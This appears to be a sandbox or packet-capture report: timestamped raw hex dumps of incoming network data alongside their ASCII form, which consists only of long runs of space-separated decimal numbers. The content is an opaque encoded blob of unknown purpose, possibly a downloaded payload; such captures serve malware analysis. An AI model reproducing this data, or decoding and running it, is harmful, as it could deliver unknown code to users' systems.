                    2021-10-26 16:59:38 UTC2042INData Raw: 37 32 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 36 32 20 33 38 20 36 31 20 33 33 20 31 30 34 20 31 30 34 20 39 34 20 31 31 30 20 36 31 20 31 30 20 32 39 20 34 32 20 34 30 20 31 30 20 31 31 39 20 38 36 20 37 20 31 30 30 20 38 36 20 35 20 35 20 37 32 20 38 38 20 30 20 36 36 20 35 20 31 31 20 34 32 20 31 37 20 35 38 20 36 36 20 37 34 20 37 31 20 36 34 20 38 30 20 33 37 20 38 20 37 30 20 33 20 36 33 20 35 20 31 32 35 20 31 30 37 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 34 31 20 31 30 30 20 38 37 20 31 30 37 20 39 33 20 36 31 20 35 31 20 32 34 20 35 20 32 30 20 31 30 32 20 39 33 20 39 31 20 36 39 20 31 32 20 33 39 20 35 36 20 35 39 20 35 36 20 31 30 37 20 39 32 20 31 32 30 20 39 39 20 32 38 20 38 20 32 32 20 34 37 20 32 30 20 38 35 20 38 37 20 38
                    Data Ascii: 72 15 48 17 11 37 62 38 61 33 104 104 94 110 61 10 29 42 40 10 119 86 7 100 86 5 5 72 88 0 66 5 11 42 17 58 66 74 71 64 80 37 8 70 3 63 5 125 107 11 84 81 72 28 41 100 87 107 93 61 51 24 5 20 102 93 91 69 12 39 56 59 56 107 92 120 99 28 8 22 47 20 85 87 8
                    2021-10-26 16:59:38 UTC2058INData Raw: 20 39 35 20 38 31 20 34 20 31 31 35 20 35 37 20 31 30 20 33 39 20 37 33 20 33 34 20 32 32 20 36 39 20 33 20 33 20 31 38 20 35 37 20 33 37 20 36 33 20 32 36 20 31 32 35 20 39 39 20 37 32 20 31 31 37 20 31 20 35 39 20 32 20 38 30 20 31 31 32 20 31 37 20 31 33 20 36 37 20 36 36 20 32 36 20 31 36 20 35 35 20 38 39 20 36 38 20 31 31 39 20 33 20 36 20 39 39 20 36 31 20 34 35 20 32 38 20 38 38 20 39 20 31 32 30 20 31 30 35 20 39 39 20 33 20 35 38 20 36 20 32 20 38 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 31 30 31 20 34 20 33 34 20 33 31 20 36 30 20 39 30 20 36 37 20 38 39 20 36 38 20 32 36 20 37 30 20 35 38 20 32 20 33 39 20 37 32 20 37 32 20 31 32 31 20 36 37 20 31 36 20 35 34 20 33 38 20 36 30 20 37 37 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20
                    Data Ascii: 95 81 4 115 57 10 39 73 34 22 69 3 3 18 57 37 63 26 125 99 72 117 1 59 2 80 112 17 13 67 66 26 16 55 89 68 119 3 6 99 61 45 28 88 9 120 105 99 3 58 6 2 80 77 50 19 15 71 101 4 34 31 60 90 67 89 68 26 70 58 2 39 72 72 121 67 16 54 38 60 77 15 48 17 11 37
                    2021-10-26 16:59:38 UTC2074INData Raw: 30 32 20 39 38 20 33 35 20 32 31 20 37 20 35 38 20 36 31 20 32 32 20 38 36 20 31 32 37 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 33 37 20 39 36 20 31 32 31 20 37 34 20 31 32 33 20 32 37 20 35 33 20 36 39 20 33 37 20 35 37 20 39 35 20 37 31 20 31 31 39 20 31 30 32 20 39 36 20 35 31 20 36 37 20 32 33 20 35 33 20 39 31 20 39 36 20 38 35 20 31 31 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 31 30 33 20 31 20 38 35 20 30 20 35 37 20 36 37 20 35 34 20 34 20 35 38 20 37 20 37 33 20 37 32 20 31 32 32 20 31 37 20 34 39 20 32 36 20 32 31 20 36 35 20 39 30 20 31 31 34 20 36 34 20 36 35 20 31 30 35 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 31 32 32 20 31 30 37 20 30 20 33 33 20 34 38 20 32 34 20 34 34 20 37 31 20 38 30 20 39 30 20 31 31 32 20 35
                    Data Ascii: 02 98 35 21 7 58 61 22 86 127 11 84 81 72 28 37 96 121 74 123 27 53 69 37 57 95 71 119 102 96 51 67 23 53 91 96 85 11 105 114 86 80 1 103 1 85 0 57 67 54 4 58 7 73 72 122 17 49 26 21 65 90 114 64 65 105 79 117 78 77 67 122 107 0 33 48 24 44 71 80 90 112 5
                    2021-10-26 16:59:38 UTC2090INData Raw: 20 38 33 20 39 35 20 35 38 20 31 31 34 20 32 30 20 39 20 32 30 20 31 30 39 20 31 30 31 20 39 32 20 39 34 20 35 33 20 32 38 20 31 37 20 31 20 32 31 20 38 36 20 31 31 37 20 37 34 20 38 35 20 34 39 20 32 20 31 20 34 20 33 31 20 39 32 20 34 38 20 38 33 20 38 32 20 34 38 20 34 35 20 35 32 20 33 30 20 33 20 38 37 20 39 33 20 38 30 20 39 30 20 34 35 20 33 32 20 31 36 20 33 30 20 33 31 20 39 34 20 37 30 20 38 37 20 35 34 20 35 31 20 32 33 20 31 20 35 30 20 33 35 20 37 30 20 38 31 20 36 34 20 36 36 20 33 33 20 32 20 33 37 20 31 32 20 34 20 39 30 20 34 38 20 36 35 20 38 33 20 33 32 20 34 35 20 35 34 20 32 34 20 32 20 36 34 20 38 35 20 39 32 20 36 36 20 31 36 20 32 37 20 37 20 38 20 31 39 20 37 30 20 39 35 20 36 34 20 37 39 20 38 34 20 32 31 20 31 36 20 32 35 20 34
                    Data Ascii: 83 95 58 114 20 9 20 109 101 92 94 53 28 17 1 21 86 117 74 85 49 2 1 4 31 92 48 83 82 48 45 52 30 3 87 93 80 90 45 32 16 30 31 94 70 87 54 51 23 1 50 35 70 81 64 66 33 2 37 12 4 90 48 65 83 32 45 54 24 2 64 85 92 66 16 27 7 8 19 70 95 64 79 84 21 16 25 4
                    2021-10-26 16:59:38 UTC2106INData Raw: 31 34 20 31 30 36 20 31 30 39 20 33 39 20 33 33 20 31 37 38 20 31 34 37 20 38 36 20 31 32 34 20 31 30 35 20 31 32 30 20 39 37 20 31 37 38 20 31 37 33 20 34 38 20 35 36 20 37 32 20 31 30 33 20 31 30 33 20 32 33 37 20 32 31 37 20 35 31 20 33 37 20 33 35 20 31 38 32 20 32 34 31 20 31 31 32 20 31 32 33 20 31 31 33 20 31 30 31 20 33 32 20 31 37 36 20 31 37 31 20 35 32 20 39 30 20 31 31 30 20 39 36 20 31 32 34 20 32 34 30 20 31 35 31 20 35 30 20 36 30 20 34 32 20 36 35 20 39 39 20 32 34 35 20 32 30 30 20 31 31 34 20 36 30 20 34 34 20 33 39 20 33 39 20 32 31 32 20 32 31 35 20 31 31 39 20 39 39 20 31 30 38 20 36 32 20 33 37 20 33 32 20 31 38 32 20 32 35 33 20 31 31 35 20 39 36 20 31 32 34 20 32 34 30 20 31 35 31 20 35 30 20 36 30 20 34 32 20 39 35 20 38 32 20 31
                    Data Ascii: 14 106 109 39 33 178 147 86 124 105 120 97 178 173 48 56 72 103 103 237 217 51 37 35 182 241 112 123 113 101 32 176 171 52 90 110 96 124 240 151 50 60 42 65 99 245 200 114 60 44 39 39 212 215 119 99 108 62 37 32 182 253 115 96 124 240 151 50 60 42 95 82 1
                    2021-10-26 16:59:38 UTC2122INData Raw: 34 39 20 31 32 33 20 35 39 20 31 37 38 20 31 30 35 20 31 30 38 20 32 33 35 20 31 37 34 20 36 33 20 31 20 31 31 39 20 31 33 38 20 31 32 35 20 31 30 36 20 31 34 38 20 31 36 34 20 31 33 39 20 32 34 35 20 32 31 33 20 36 34 20 32 33 35 20 35 38 20 39 37 20 35 31 20 31 33 35 20 31 38 30 20 33 34 20 31 35 30 20 35 39 20 31 33 38 20 37 20 32 34 31 20 35 34 20 33 32 20 34 34 20 31 38 34 20 32 30 33 20 31 37 33 20 39 33 20 31 32 32 20 31 39 31 20 35 34 20 31 34 35 20 31 33 39 20 31 34 31 20 37 30 20 32 33 33 20 32 34 37 20 32 31 38 20 31 30 33 20 32 32 36 20 36 31 20 32 31 35 20 31 37 31 20 31 39 20 34 38 20 37 36 20 32 32 34 20 31 34 36 20 32 37 20 32 32 34 20 31 33 39 20 34 39 20 34 33 20 34 37 20 31 30 31 20 32 31 36 20 36 36 20 38 20 31 33 20 32 32 35 20 31 35
                    Data Ascii: 49 123 59 178 105 108 235 174 63 1 119 138 125 106 148 164 139 245 213 64 235 58 97 51 135 180 34 150 59 138 7 241 54 32 44 184 203 173 93 122 191 54 145 139 141 70 233 247 218 103 226 61 215 171 19 48 76 224 146 27 224 139 49 43 47 101 216 66 8 13 225 15
                    2021-10-26 16:59:38 UTC2138INData Raw: 31 34 35 20 39 20 36 38 20 32 34 30 20 38 31 20 32 35 31 20 32 35 31 20 35 34 20 31 34 20 31 34 35 20 31 36 39 20 39 31 20 31 33 30 20 35 37 20 31 39 33 20 31 39 31 20 32 35 31 20 37 34 20 31 31 31 20 31 32 30 20 31 30 31 20 32 32 35 20 36 36 20 32 30 34 20 34 37 20 31 33 33 20 31 36 34 20 38 30 20 36 35 20 31 38 34 20 32 38 20 31 39 38 20 39 32 20 35 39 20 31 31 32 20 31 33 38 20 32 33 38 20 32 33 32 20 31 34 20 31 31 31 20 31 39 30 20 39 34 20 38 31 20 32 32 33 20 31 34 30 20 31 39 31 20 35 39 20 31 37 31 20 39 39 20 31 36 30 20 31 30 36 20 39 32 20 32 32 34 20 31 31 34 20 35 37 20 38 37 20 31 39 38 20 34 36 20 32 30 33 20 36 33 20 31 30 33 20 32 35 30 20 31 35 31 20 31 30 35 20 32 30 30 20 32 31 30 20 31 32 30 20 31 37 33 20 37 36 20 32 39 20 35 32 20
                    Data Ascii: 145 9 68 240 81 251 251 54 14 145 169 91 130 57 193 191 251 74 111 120 101 225 66 204 47 133 164 80 65 184 28 198 92 59 112 138 238 232 14 111 190 94 81 223 140 191 59 171 99 160 106 92 224 114 57 87 198 46 203 63 103 250 151 105 200 210 120 173 76 29 52
                    2021-10-26 16:59:38 UTC2154INData Raw: 37 20 31 31 33 20 32 34 36 20 37 38 20 32 33 35 20 35 34 20 38 33 20 31 35 34 20 31 31 38 20 33 33 20 31 30 20 31 30 31 20 31 33 36 20 31 31 39 20 32 32 34 20 33 30 20 31 34 31 20 38 36 20 35 36 20 32 30 35 20 36 35 20 31 33 30 20 39 39 20 31 36 31 20 31 34 39 20 31 32 34 20 39 39 20 32 34 33 20 31 31 36 20 34 32 20 36 33 20 36 32 20 32 30 34 20 32 33 32 20 31 20 39 37 20 33 34 20 32 31 33 20 39 30 20 31 31 20 32 31 37 20 31 37 30 20 31 37 34 20 31 38 35 20 31 33 36 20 39 20 34 32 20 32 32 32 20 31 35 20 33 31 20 34 32 20 31 35 39 20 31 32 30 20 39 37 20 31 38 30 20 31 32 37 20 38 37 20 38 36 20 39 31 20 31 37 20 31 36 39 20 31 38 39 20 32 31 31 20 31 31 30 20 31 34 38 20 32 35 34 20 34 34 20 31 30 32 20 31 34 32 20 37 38 20 37 39 20 31 36 37 20 37 34 20
                    Data Ascii: 7 113 246 78 235 54 83 154 118 33 10 101 136 119 224 30 141 86 56 205 65 130 99 161 149 124 99 243 116 42 63 62 204 232 1 97 34 213 90 11 217 170 174 185 136 9 42 222 15 31 42 159 120 97 180 127 87 86 91 17 169 189 211 110 148 254 44 102 142 78 79 167 74
                    2021-10-26 16:59:38 UTC2170INData Raw: 20 32 33 20 37 32 20 31 34 36 20 31 33 36 20 32 33 35 20 38 20 31 31 35 20 37 33 20 31 35 39 20 31 38 30 20 31 34 30 20 31 37 36 20 31 33 32 20 31 30 39 20 32 34 36 20 32 31 30 20 32 31 36 20 31 38 32 20 31 31 33 20 32 37 20 31 32 38 20 36 39 20 39 31 20 31 39 35 20 31 34 31 20 32 34 37 20 37 30 20 34 35 20 31 30 34 20 31 37 20 36 33 20 37 32 20 32 30 20 31 39 30 20 37 38 20 31 34 33 20 35 38 20 32 34 39 20 32 33 38 20 31 36 38 20 32 36 20 31 38 20 31 31 38 20 32 37 20 31 33 33 20 31 38 31 20 31 39 32 20 32 30 39 20 32 30 37 20 35 33 20 31 33 38 20 31 32 31 20 31 36 34 20 31 33 34 20 31 39 20 38 20 31 34 20 38 35 20 31 30 35 20 31 37 30 20 31 35 36 20 34 32 20 31 36 20 31 32 32 20 32 31 35 20 31 30 32 20 31 36 35 20 39 35 20 31 31 39 20 34 33 20 32 31 39
                    Data Ascii: 23 72 146 136 235 8 115 73 159 180 140 176 132 109 246 210 216 182 113 27 128 69 91 195 141 247 70 45 104 17 63 72 20 190 78 143 58 249 238 168 26 18 118 27 133 181 192 209 207 53 138 121 164 134 19 8 14 85 105 170 156 42 16 122 215 102 165 95 119 43 219
                    2021-10-26 16:59:38 UTC2186INData Raw: 31 35 31 20 32 30 35 20 31 34 37 20 33 20 39 20 31 37 38 20 35 38 20 31 32 32 20 31 35 34 20 31 32 35 20 31 39 37 20 32 31 39 20 31 32 37 20 31 37 38 20 34 20 31 39 30 20 31 39 37 20 32 35 33 20 39 33 20 32 30 38 20 31 34 35 20 31 33 32 20 39 20 32 34 38 20 31 39 38 20 31 38 33 20 31 37 38 20 31 34 33 20 32 33 30 20 31 20 33 39 20 31 36 33 20 38 20 39 33 20 31 30 35 20 31 30 33 20 31 30 30 20 31 31 31 20 39 34 20 31 32 37 20 31 34 37 20 32 30 34 20 36 31 20 37 34 20 32 34 32 20 32 33 33 20 37 38 20 32 34 20 36 20 31 32 34 20 31 37 34 20 31 37 36 20 36 38 20 32 31 36 20 31 32 34 20 39 34 20 31 37 32 20 31 39 31 20 31 32 34 20 32 30 31 20 32 32 20 35 32 20 31 33 31 20 32 30 39 20 31 32 20 32 30 32 20 32 34 39 20 32 30 20 32 38 20 36 31 20 31 31 33 20 31 35
                    Data Ascii: 151 205 147 3 9 178 58 122 154 125 197 219 127 178 4 190 197 253 93 208 145 132 9 248 198 183 178 143 230 1 39 163 8 93 105 103 100 111 94 127 147 204 61 74 242 233 78 24 6 124 174 176 68 216 124 94 172 191 124 201 22 52 131 209 12 202 249 20 28 61 113 15
                    2021-10-26 16:59:38 UTC2202INData Raw: 31 34 32 20 31 30 39 20 31 36 20 32 33 35 20 32 32 39 20 31 35 38 20 35 20 31 37 20 31 34 38 20 31 37 20 37 30 20 31 38 38 20 31 37 36 20 31 32 34 20 31 37 36 20 31 36 38 20 31 30 37 20 32 38 20 31 36 32 20 33 35 20 31 32 32 20 31 34 38 20 32 35 33 20 31 35 34 20 31 30 34 20 32 35 31 20 32 31 34 20 31 37 31 20 38 39 20 36 35 20 33 34 20 38 20 31 37 39 20 31 30 31 20 35 36 20 32 30 34 20 31 37 36 20 32 33 32 20 32 32 20 35 36 20 31 37 36 20 38 30 20 31 37 34 20 31 32 30 20 31 34 32 20 32 31 36 20 32 35 33 20 37 37 20 36 34 20 37 38 20 35 39 20 32 34 30 20 38 39 20 32 38 20 37 32 20 32 31 34 20 31 34 20 32 32 31 20 32 33 37 20 31 38 37 20 32 20 31 34 38 20 31 37 37 20 32 34 32 20 31 31 39 20 32 30 39 20 34 35 20 36 37 20 31 39 38 20 31 37 36 20 32 33 34 20
                    Data Ascii: 142 109 16 235 229 158 5 17 148 17 70 188 176 124 176 168 107 28 162 35 122 148 253 154 104 251 214 171 89 65 34 8 179 101 56 204 176 232 22 56 176 80 174 120 142 216 253 77 64 78 59 240 89 28 72 214 14 221 237 187 2 148 177 242 119 209 45 67 198 176 234
                    2021-10-26 16:59:38 UTC2218INData Raw: 35 36 20 32 34 35 20 31 31 37 20 32 30 39 20 31 39 30 20 31 31 30 20 32 32 35 20 33 33 20 32 32 39 20 34 37 20 32 33 36 20 33 35 20 31 32 39 20 31 32 37 20 31 39 37 20 31 35 30 20 31 35 31 20 37 37 20 35 39 20 31 36 33 20 31 35 36 20 38 33 20 31 34 33 20 33 38 20 32 32 32 20 31 38 36 20 36 32 20 31 35 20 32 31 30 20 31 32 37 20 31 36 20 32 39 20 32 34 31 20 31 32 38 20 31 38 33 20 31 35 32 20 31 30 39 20 31 35 30 20 35 37 20 32 31 33 20 31 32 31 20 32 33 36 20 34 20 34 20 32 38 20 38 20 33 36 20 39 36 20 32 32 33 20 37 33 20 32 31 39 20 32 35 33 20 31 38 37 20 37 39 20 31 34 35 20 31 30 37 20 32 31 37 20 36 32 20 31 35 30 20 32 34 20 34 37 20 31 32 20 32 30 33 20 31 34 31 20 32 31 31 20 32 31 39 20 31 31 36 20 31 37 38 20 32 32 31 20 31 30 35 20 32 39 20
                    Data Ascii: 56 245 117 209 190 110 225 33 229 47 236 35 129 127 197 150 151 77 59 163 156 83 143 38 222 186 62 15 210 127 16 29 241 128 183 152 109 150 57 213 121 236 4 4 28 8 36 96 223 73 219 253 187 79 145 107 217 62 150 24 47 12 203 141 211 219 116 178 221 105 29
                    2021-10-26 16:59:38 UTC2234INData Raw: 36 32 20 31 30 31 20 31 38 20 31 33 34 20 32 33 34 20 32 34 36 20 31 32 32 20 34 34 20 39 33 20 36 35 20 31 34 34 20 32 31 20 32 31 36 20 31 31 35 20 32 31 31 20 31 37 39 20 34 39 20 31 39 36 20 31 37 30 20 32 32 37 20 31 36 38 20 31 31 37 20 37 33 20 31 34 30 20 32 30 32 20 32 30 36 20 32 32 34 20 32 30 31 20 34 31 20 38 34 20 31 35 33 20 36 38 20 33 38 20 32 34 30 20 32 30 36 20 31 32 38 20 31 33 38 20 36 33 20 32 30 37 20 31 33 20 37 31 20 31 34 33 20 31 35 33 20 39 20 33 35 20 32 34 36 20 36 36 20 31 39 31 20 34 33 20 31 31 38 20 31 31 39 20 39 39 20 32 34 32 20 31 39 38 20 31 35 30 20 32 34 31 20 31 35 39 20 33 20 31 30 30 20 31 39 39 20 31 31 37 20 31 34 34 20 31 39 34 20 31 37 37 20 31 32 36 20 31 37 35 20 31 33 20 39 31 20 31 34 31 20 32 32 31 20
                    Data Ascii: 62 101 18 134 234 246 122 44 93 65 144 21 216 115 211 179 49 196 170 227 168 117 73 140 202 206 224 201 41 84 153 68 38 240 206 128 138 63 207 13 71 143 153 9 35 246 66 191 43 118 119 99 242 198 150 241 159 3 100 199 117 144 194 177 126 175 13 91 141 221
                    2021-10-26 16:59:38 UTC2246INData Raw: 32 30 30 20 31 38 30 20 32 33 34 20 31 36 32 20 32 31 36 20 32 33 36 20 31 31 32 20 35 35 20 37 34 20 31 32 20 36 31 20 38 20 32 38 20 32 33 32 20 32 30 32 20 31 36 35 20 32 37 20 39 33 20 34 20 37 37 20 32 32 20 31 31 38 20 33 31 20 31 33 34 20 32 35 35 20 34 30 20 32 36 20 32 35 34 20 36 38 20 34 39 20 32 34 39 20 31 30 39 20 31 34 33 20 37 39 20 31 39 34 20 32 38 20 37 39 20 31 39 31 20 37 38 20 32 31 30 20 32 30 31 20 31 36 36 20 32 31 30 20 31 32 36 20 38 20 32 31 36 20 32 33 39 20 37 30 20 31 32 36 20 31 31 34 20 32 31 30 20 35 37 20 31 31 31 20 31 30 35 20 39 34 20 32 34 32 20 31 39 35 20 32 31 33 20 31 35 36 20 31 33 33 20 31 39 32 20 32 33 38 20 32 31 34 20 31 39 33 20 32 30 33 20 31 38 39 20 39 35 20 38 32 20 31 35 39 20 31 32 30 20 32 34 33 20
                    Data Ascii: 200 180 234 162 216 236 112 55 74 12 61 8 28 232 202 165 27 93 4 77 22 118 31 134 255 40 26 254 68 49 249 109 143 79 194 28 79 191 78 210 201 166 210 126 8 216 239 70 126 114 210 57 111 105 94 242 195 213 156 133 192 238 214 193 203 189 95 82 159 120 243
                    2021-10-26 16:59:38 UTC2262INData Raw: 20 31 37 37 20 32 32 33 20 31 37 31 20 31 37 30 20 33 31 20 34 30 20 32 34 38 20 34 35 20 31 35 34 20 32 35 33 20 35 20 31 37 37 20 31 35 30 20 31 36 30 20 31 31 39 20 32 34 30 20 32 32 31 20 32 31 20 31 32 35 20 31 35 39 20 35 37 20 32 34 35 20 32 33 32 20 31 30 31 20 31 31 32 20 32 35 35 20 37 31 20 31 37 39 20 32 35 35 20 31 36 32 20 32 31 20 31 34 32 20 31 34 20 32 30 32 20 34 31 20 32 31 34 20 31 37 37 20 31 38 33 20 38 32 20 31 34 32 20 39 35 20 31 39 39 20 39 37 20 32 35 31 20 32 31 33 20 31 31 20 32 30 39 20 31 35 30 20 32 34 37 20 31 32 32 20 31 30 35 20 35 37 20 31 39 20 32 30 32 20 31 20 32 31 37 20 31 38 39 20 37 31 20 32 30 37 20 33 20 35 32 20 31 37 37 20 32 31 31 20 31 30 32 20 37 35 20 34 31 20 32 32 32 20 39 32 20 37 33 20 31 36 32 20 37
                    Data Ascii: 177 223 171 170 31 40 248 45 154 253 5 177 150 160 119 240 221 21 125 159 57 245 232 101 112 255 71 179 255 162 21 142 14 202 41 214 177 183 82 142 95 199 97 251 213 11 209 150 247 122 105 57 19 202 1 217 189 71 207 3 52 177 211 102 75 41 222 92 73 162 7
                    2021-10-26 16:59:38 UTC2278INData Raw: 36 20 31 38 39 20 37 32 20 31 36 38 20 31 35 33 20 32 34 33 20 31 33 37 20 31 34 31 20 32 35 20 31 30 20 31 38 38 20 32 30 38 20 32 32 38 20 31 39 37 20 32 33 31 20 34 32 20 31 39 33 20 31 35 31 20 34 37 20 31 38 37 20 32 37 20 31 32 35 20 32 30 38 20 32 34 39 20 34 37 20 31 32 33 20 31 34 37 20 31 35 30 20 31 35 35 20 32 33 35 20 33 38 20 32 31 38 20 31 35 35 20 37 32 20 32 32 34 20 31 30 36 20 31 39 36 20 38 37 20 31 30 20 31 30 33 20 37 20 32 34 33 20 32 31 36 20 32 35 30 20 31 31 34 20 32 30 34 20 32 35 30 20 32 33 33 20 32 32 39 20 31 33 35 20 32 30 34 20 32 33 36 20 32 33 32 20 39 34 20 38 31 20 31 34 20 32 31 37 20 31 37 36 20 31 38 35 20 31 35 20 32 34 30 20 32 32 37 20 31 37 36 20 35 20 34 36 20 37 31 20 33 36 20 32 31 32 20 32 31 34 20 39 38 20
                    Data Ascii: 6 189 72 168 153 243 137 141 25 10 188 208 228 197 231 42 193 151 47 187 27 125 208 249 47 123 147 150 155 235 38 218 155 72 224 106 196 87 10 103 7 243 216 250 114 204 250 233 229 135 204 236 232 94 81 14 217 176 185 15 240 227 176 5 46 71 36 212 214 98
                    2021-10-26 16:59:38 UTC2294INData Raw: 20 39 33 20 36 30 20 31 31 34 20 31 30 36 20 32 34 38 20 32 35 30 20 38 37 20 31 36 30 20 32 30 32 20 33 32 20 32 33 35 20 31 31 31 20 38 35 20 38 36 20 32 34 35 20 32 31 33 20 31 35 38 20 31 34 31 20 31 35 39 20 31 33 34 20 31 36 33 20 31 31 20 32 34 31 20 31 36 31 20 31 37 38 20 33 20 32 33 33 20 31 39 35 20 31 34 34 20 32 31 36 20 32 34 35 20 31 34 39 20 34 37 20 31 39 38 20 38 39 20 36 33 20 35 39 20 32 30 35 20 31 39 30 20 32 33 20 39 20 31 31 30 20 32 30 20 32 35 33 20 31 30 31 20 34 31 20 36 35 20 31 38 35 20 31 39 30 20 35 20 31 38 33 20 36 38 20 32 32 32 20 37 33 20 35 30 20 31 36 34 20 32 32 37 20 31 33 31 20 36 36 20 31 34 31 20 31 30 38 20 38 34 20 31 32 30 20 31 35 31 20 34 37 20 32 35 20 34 34 20 37 30 20 39 20 32 32 38 20 34 30 20 38 37 20
                    Data Ascii: 93 60 114 106 248 250 87 160 202 32 235 111 85 86 245 213 158 141 159 134 163 11 241 161 178 3 233 195 144 216 245 149 47 198 89 63 59 205 190 23 9 110 20 253 101 41 65 185 190 5 183 68 222 73 50 164 227 131 66 141 108 84 120 151 47 25 44 70 9 228 40 87
                    2021-10-26 16:59:38 UTC2310INData Raw: 20 35 34 20 31 35 37 20 31 36 35 20 32 31 32 20 32 31 35 20 31 35 31 20 31 33 39 20 31 39 33 20 32 35 33 20 31 35 38 20 31 33 38 20 37 36 20 37 30 20 32 35 33 20 36 37 20 31 36 34 20 35 39 20 32 31 36 20 31 39 20 32 32 31 20 33 30 20 31 32 33 20 31 33 20 31 34 33 20 31 35 20 32 35 34 20 36 39 20 31 37 34 20 36 20 35 31 20 31 34 32 20 31 32 20 36 37 20 31 37 35 20 35 37 20 31 37 20 31 37 20 32 33 39 20 31 37 30 20 34 36 20 35 32 20 33 35 20 31 32 38 20 31 33 31 20 31 30 34 20 39 31 20 31 30 35 20 32 32 20 32 30 31 20 32 33 34 20 32 36 20 37 35 20 31 34 37 20 36 33 20 35 31 20 31 36 20 31 39 33 20 31 31 33 20 32 34 30 20 31 37 38 20 31 33 38 20 31 30 37 20 39 33 20 32 38 20 31 35 33 20 31 39 38 20 31 33 38 20 35 37 20 31 31 20 31 31 33 20 38 37 20 31 39 34
                    Data Ascii: 54 157 165 212 215 151 139 193 253 158 138 76 70 253 67 164 59 216 19 221 30 123 13 143 15 254 69 174 6 51 142 12 67 175 57 17 17 239 170 46 52 35 128 131 104 91 105 22 201 234 26 75 147 63 51 16 193 113 240 178 138 107 93 28 153 198 138 57 11 113 87 194
                    2021-10-26 16:59:38 UTC2326INData Raw: 35 37 20 31 34 30 20 32 34 34 20 35 32 20 32 30 32 20 37 20 34 33 20 33 38 20 31 30 34 20 31 33 37 20 33 36 20 37 39 20 31 33 38 20 31 30 31 20 32 30 31 20 31 34 38 20 31 34 38 20 32 31 32 20 32 30 33 20 38 35 20 36 33 20 31 31 38 20 34 20 35 38 20 31 34 32 20 31 32 36 20 32 30 33 20 31 36 37 20 32 30 37 20 39 33 20 32 31 37 20 33 35 20 32 31 20 31 37 20 31 35 20 31 34 36 20 31 38 33 20 34 31 20 32 30 38 20 31 32 39 20 32 35 32 20 32 34 35 20 37 39 20 31 37 39 20 31 35 36 20 31 36 37 20 39 38 20 31 31 31 20 32 33 31 20 31 30 35 20 39 32 20 39 38 20 32 32 31 20 31 34 30 20 31 30 31 20 32 32 20 31 39 37 20 31 37 30 20 33 36 20 34 36 20 35 37 20 33 39 20 38 30 20 37 37 20 31 39 39 20 39 35 20 31 31 20 31 30 31 20 31 35 39 20 32 32 30 20 31 35 32 20 31 32 20
                    Data Ascii: 57 140 244 52 202 7 43 38 104 137 36 79 138 101 201 148 148 212 203 85 63 118 4 58 142 126 203 167 207 93 217 35 21 17 15 146 183 41 208 129 252 245 79 179 156 167 98 111 231 105 92 98 221 140 101 22 197 170 36 46 57 39 80 77 199 95 11 101 159 220 152 12
                    2021-10-26 16:59:38 UTC2342INData Raw: 33 20 31 37 30 20 37 38 20 32 31 20 39 35 20 32 34 39 20 37 33 20 39 30 20 32 30 35 20 31 37 20 33 31 20 34 35 20 31 37 31 20 31 39 34 20 37 39 20 32 31 32 20 32 34 36 20 39 38 20 36 35 20 38 32 20 31 34 39 20 31 36 34 20 36 38 20 31 35 20 31 36 39 20 31 39 20 31 35 20 34 35 20 32 39 20 31 30 39 20 33 38 20 31 30 31 20 32 30 30 20 31 32 32 20 31 39 37 20 37 37 20 39 37 20 31 36 37 20 37 32 20 39 31 20 32 34 37 20 32 33 33 20 32 33 37 20 31 38 32 20 31 31 34 20 31 36 34 20 31 30 37 20 32 33 36 20 31 37 35 20 37 38 20 31 39 37 20 39 39 20 31 36 37 20 38 31 20 32 32 36 20 32 33 32 20 35 38 20 39 35 20 32 34 35 20 32 34 33 20 32 35 34 20 31 37 31 20 31 32 32 20 31 33 37 20 31 35 35 20 31 34 35 20 39 36 20 32 35 31 20 32 31 32 20 32 33 34 20 31 39 38 20 31 33
                    Data Ascii: 3 170 78 21 95 249 73 90 205 17 31 45 171 194 79 212 246 98 65 82 149 164 68 15 169 19 15 45 29 109 38 101 200 122 197 77 97 167 72 91 247 233 237 182 114 164 107 236 175 78 197 99 167 81 226 232 58 95 245 243 254 171 122 137 155 145 96 251 212 234 198 13
                    2021-10-26 16:59:38 UTC2358INData Raw: 20 32 35 34 20 37 34 20 32 34 39 20 32 34 31 20 33 33 20 39 34 20 31 30 37 20 31 36 38 20 31 30 38 20 31 39 35 20 31 34 33 20 31 39 34 20 35 36 20 31 32 36 20 31 33 36 20 31 36 20 31 35 38 20 31 30 35 20 31 32 33 20 31 39 35 20 32 33 31 20 31 37 34 20 38 37 20 32 30 31 20 31 32 39 20 31 31 37 20 37 32 20 31 35 34 20 31 31 36 20 38 38 20 34 32 20 31 34 35 20 31 36 37 20 35 37 20 31 33 37 20 31 31 39 20 31 37 20 31 33 34 20 32 30 38 20 31 30 38 20 31 33 33 20 36 35 20 32 34 33 20 32 31 35 20 31 33 32 20 31 31 39 20 32 30 34 20 31 34 35 20 31 39 32 20 38 36 20 31 38 35 20 31 33 37 20 31 34 37 20 37 38 20 39 30 20 31 35 30 20 31 34 34 20 36 36 20 31 37 39 20 31 35 31 20 32 31 37 20 31 35 37 20 31 36 39 20 31 39 31 20 31 35 31 20 33 35 20 32 31 36 20 32 35 34
                    Data Ascii: 254 74 249 241 33 94 107 168 108 195 143 194 56 126 136 16 158 105 123 195 231 174 87 201 129 117 72 154 116 88 42 145 167 57 137 119 17 134 208 108 133 65 243 215 132 119 204 145 192 86 185 137 147 78 90 150 144 66 179 151 217 157 169 191 151 35 216 254
